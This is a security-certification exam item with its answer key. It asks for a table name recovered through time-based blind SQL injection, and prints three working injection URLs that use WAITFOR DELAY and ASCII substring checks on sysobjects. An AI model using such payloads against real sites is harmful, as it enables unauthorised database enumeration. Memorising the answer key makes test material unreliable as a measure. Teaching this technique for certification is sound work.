EC-Council Certified Security Analyst (ECSA v8) — Question 13
A pen tester has extracted a database name by using a blind SQL injection. Now he begins to test the table inside the database using the below query and finds the table: http://juggyboy.com/page.aspx?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype='U')=3) WAITFOR DELAY '00:00:10'-- http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),1,1)))=101) WAITFOR DELAY
'00:00:10'--
http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),2,1)))=109) WAITFOR DELAY
'00:00:10'--
http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),3,1)))=112) WAITFOR DELAY
'00:00:10'
What is the table name?
Answer options
- A. CTS
- B. QRT
- C. EMP
- D. ABC
Correct answer: C
Explanation
The correct answer is C, EMP, because the queries reveal that the first three letters of the table name correspond to the ASCII values of 'e', 'm', and 'p', respectively. The other options (A, B, D) do not match the criteria established by the SQL queries.